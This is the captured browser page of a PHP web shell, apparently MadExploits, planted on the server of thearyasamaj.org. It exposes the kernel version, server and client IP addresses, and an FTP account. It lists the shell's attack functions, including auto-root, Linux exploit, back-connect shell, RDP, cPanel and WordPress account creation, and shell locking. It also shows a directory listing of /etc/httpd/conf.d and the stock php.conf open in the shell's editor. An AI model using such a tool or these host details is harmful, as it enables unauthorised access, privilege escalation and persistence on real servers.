Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
httpd /
conf.d /
[ HOME SHELL ]
Name
Size
Permission
Action
README
400
B
-rw-r--r--
autoindex.conf
2.86
KB
-rw-r--r--
awstats.conf
1.18
KB
-rw-r--r--
fcgid.conf
496
B
-rw-r--r--
php.conf
1.61
KB
-rw-r--r--
php.conf.rpmnew
1.58
KB
-rw-r--r--
php56-php.conf
1.51
KB
-rw-r--r--
php70-php.conf
1.63
KB
-rw-r--r--
php71-php.conf
1.63
KB
-rw-r--r--
php72-php.conf
1.64
KB
-rw-r--r--
php73-php.conf
1.64
KB
-rw-r--r--
php74-php.conf
1.64
KB
-rw-r--r--
php80-php.conf
1.69
KB
-rw-r--r--
php81-php.conf
1.69
KB
-rw-r--r--
php82-php.conf
1.69
KB
-rw-r--r--
php83-php.conf
1.69
KB
-rw-r--r--
ssl.conf
8.55
KB
-rw-r--r--
userdir.conf
1.2
KB
-rw-r--r--
webalizer.conf
302
B
-rw-r--r--
welcome.conf
587
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : php.conf
# # The following lines prevent .user.ini files from being viewed by Web clients. # #<Files ".user.ini"> # Require all denied #</Files> # # # Allow php to handle Multiviews # #AddType text/html .php # # # Add index.php to the list of files that will be served as directory # indexes. # #DirectoryIndex index.php # # # Redirect to local php-fpm (no mod_php in default configuration) # #<IfModule !mod_php5.c> # <IfModule !mod_php7.c> # Enable http authorization headers # SetEnvIfNoCase ^Authorization$ "(.+)" HTTP_AUTHORIZATION=$1 # # <FilesMatch \.(php|phar)$> # SetHandler "proxy:unix:/run/php-fpm/www.sock|fcgi://localhost" # </FilesMatch> # </IfModule> #</IfModule> # # # mod_php is deprecated as FPM is now used by default with httpd in event mode # mod_php is only used when explicitly enabled or httpd switch to prefork mode # # mod_php options # #<IfModule mod_php7.c> # # Cause the PHP interpreter to handle files with a .php extension. # # <FilesMatch \.(php|phar)$> # SetHandler application/x-httpd-php # </FilesMatch> # # # Uncomment the following lines to allow PHP to pretty-print .phps # files as PHP source code: # #<FilesMatch \.phps$> # SetHandler application/x-httpd-php-source #</FilesMatch> # # # Apache specific PHP configuration options # those can be override in each configured vhost # # php_value session.save_handler "files" # php_value session.save_path "/var/lib/php/session" # php_value soap.wsdl_cache_dir "/var/lib/php/wsdlcache" # #php_value opcache.file_cache "/var/lib/php/opcache" #</IfModule>
Close